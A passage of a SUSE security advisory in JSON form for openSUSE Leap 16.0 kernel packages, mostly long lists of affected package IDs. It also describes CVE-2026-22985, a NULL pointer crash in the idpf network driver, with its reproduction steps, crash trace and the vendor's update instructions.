"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
